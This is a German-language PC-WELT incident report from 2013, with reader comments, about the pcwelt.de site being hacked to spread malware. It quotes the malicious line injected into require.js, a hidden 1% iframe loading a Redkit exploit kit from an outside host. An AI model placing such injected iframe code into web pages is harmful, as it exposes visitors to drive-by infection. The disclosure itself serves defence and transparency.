In eigener Sache

pcwelt.de ist wieder Malware-frei

Montag, 28.01.2013 | 14:45 von Hans-Christian Dirscherl
Malware-Attacke auf pcwelt.de beendet
Vergrößern Malware-Attacke auf pcwelt.de beendet
Die Webseite der PC-WELT, pcwelt.de, wurde am Wochenende angegriffen und zur Verbreitung von Malware missbraucht. Aktueller Stand: Pcwelt.de ist wieder frei von Schädlingen. Wir sind außerdem dabei die Sicherheitslücke zu schließen.
Am Samstag, den 26.01.13, haben die Webmaster der PC-WELT festgestellt, dass die Webseite der PC-Welt zunächst im Browser Chrome eine Malware-Warnung auslöst. Ab zirka 10:00 Uhr erschien auch in Firefox ein Warnhinweis auf Malware, wenn man pcwelt.de aufrufen wollte.
 
Unsere Techniker begannen sofort mit der Ursachenforschung und haben das Problem identifizieren und die Malware auch beseitigen können. Anschließend haben wir die Seite sofort in den Google Webmaster Tools als bereinigt gemeldet, sodass die Seite www.pcwelt.de ab zirka 22:30 Uhr wieder erreichbar war (für www.pc-welt.de und die RSS-Feeds läuft diese Meldung bei den Google Webmaster Tools derzeit noch).
 
Ursache für den Warnhinweis war eine manipulierte Javascript-Datei, die eine iFrame-Injection auf allen unseren Seiten auslöste. Die Recherchen der pcwelt.de-Webmaster ergaben, dass dieser Exploit vermutlich seit Freitag auf dem Server ausgenutzt wurde.
 
Über diese iFrame-Injection wurde dann der entsprechende Schadcode verbreitet. Bisher konnten wir die Lücke für die Attacke noch nicht ausfindig machen. Die bisher analysierten Daten lassen vermuten, dass es sich um eine Drive-by-Attacke handelte, also ein Angriff ohne wirkliche Systematik. Die Technik-Abteilung der PC-WELT sucht derzeit nach weiteren Detailinformationen zu diesem Angriff und ergreift zusätzlich Maßnahmen, um künftig solche Angriffe vermeiden zu können.

Update 15:00 Uhr:

Dem Angreifer war es gelungen eine Javascript-Datei (require.js), die wir auf jeder pcwelt.de-Seite mit ausliefern, durch eine (bis dato noch unbekannte) Sicherheitslücke derart zu kompromittieren, dass dieses zusätzliche Stück Javascript-Code sich in der require.js befand:

document.write('<iframe src="http://aod.org.hk/help/index2.php" width=1% height=1%></iframe>');
 
Diese Zeile JS-Code schreibt direkt unter das öffnende <body>-Tag einen iFrame, der bei jedem Seitenaufruf mit aufgerufen wird, genauer gesagt: dessen Inhalt. Innerhalb dieses iFrames wurde eine Schadsoftware (ein Redkit Exploit Kit) ausgeliefert, das u.a. beispielsweise versucht, die UAC (User Account Control , Benutzerkontensteuerung) von Windows auszuhebeln.
 
Dieses Verhalten führte dazu, dass Google pcwelt.de als "malicious site" einstufte, wodurch wir bei Google und auch bei  https://www.stopbadware.org / als schädlich und Schadcode-verbreitend eingestuft wurden.
 
Durch einen Whitelisting-Antrag über die Google Webmaster Tools konnten wir die pcwelt.de wieder vom "Vorhang" befreien. Jedoch geht das Domain nach Domain, so dass einzelne Domains von uns von Google noch nicht wieder als sauber eingestuft worden sind, obwohl keine Malware mehr darüber verbreitet wird.

 

Montag, 28.01.2013 | 14:45 von Hans-Christian Dirscherl
Kommentieren Kommentare zu diesem Artikel (121)
  • IRON67 22:47 | 02.02.2013

    Zitat: boston123
    ...was würde die vt-bewertung da bringen?
    Zu einen werden sehr wohl zigtausende Rechner mit derselben Malware oder zumindest einer hinreichend ähnlichen infiziert, für die dieselben Virensignaturen einen Treffer ergeben, so dass jemand, der nun zufällig etwas Verdächtiges findet und bei VT Rat sucht, dasselbe Sample scannen lässt wie andere Leute vor ihm. Guck dir dort die Funde an. Wozu gibts wohl die Option REANALYSE? Zum anderen wiederhole ich gerne: Das war als Witz gedacht. Natürlich wäre eine solche Maßnahme witzlos, weil a) zuwenige VT nutzen und b) der Aufwand zum vorsätzlichen Falschbewerten viel zu hoch wäre.
    ansonsten hast du mich missverstanden.
    Nee, glaub ich nicht. deoroller weist darauf hin, dass es für jedes AV genau eine Chance gibt. Erkennung, bevor die Malware aktiv werden kann. WAR sie aktiv, dann WAR sie per definitionem auch erfolgreich und damit ist der Zustand des PCs nicht mehr definiert.

    Antwort schreiben
  • boston123 22:25 | 02.02.2013

    die dateien werden doch in der regel nach kurzer zeit von den "verteilern" ausgetauscht. was würde die vt-bewertung da bringen? ansonsten hast du mich missverstanden. es geht um die aussage

    Was bringt es, wenn der erste Schadcode erfolgreich war? [b]Da[/b] kann man die Infektion [b]noch aufhalten[/b].
    , die ich nicht einordnen kann.

    Antwort schreiben
  • IRON67 00:41 | 31.01.2013

    Zitat: boston123
    was hätte das für einen sinn?
    Einklich™ sollte das ein Witz sein. Aber mal ernsthaft: Die Malwareverbreiter könnten auf diese Weise die Einschätzung der Ergebnisse von VT durch den misstrauischen User manipulieren.
    ich fürchte, ich verstehe deinen beitrag nicht.
    Stichwort Kompromittierung. Sobald erstmal EINE Malware aktiv werden konnte, hast du keine zuverlässige Möglichkeit mehr, eine Parallel- oder Folgeinfektion mit ANDERER Malware und damit beliebige weitere Manipulationen auszuschließen oder festzustellen. Viele kapieren das einfach nicht und freuen sich, wenn der Scanner etwas findet und in Quarantäne schickt. Und wenn du deorollers Link wegen des Englisch ablehnst, hier die deutsche Variante.

    Antwort schreiben
  • boston123 00:16 | 31.01.2013

    Zitat: IRON67
    Oder die 6 Stimmen stammen von den Malwareverteilern.
    was hätte das für einen sinn?
    Zitat: deoroller
    Was bringt es, wenn der erste Schadcode erfolgreich war? Da kann man die Infektion noch aufhalten. Später ist die Konsequenz immer die selbe.
    ich fürchte, ich verstehe deinen beitrag nicht.

    Antwort schreiben
  • deoroller 22:59 | 29.01.2013

    Was bringt es, wenn der erste Schadcode erfolgreich war? Da kann man die Infektion noch aufhalten. Später ist die Konsequenz immer die selbe.

    The only way to clean a compromised system is to flatten and rebuild.
    http://technet.microsoft.com/library/cc512587.aspx[/url

    Antwort schreiben
1674044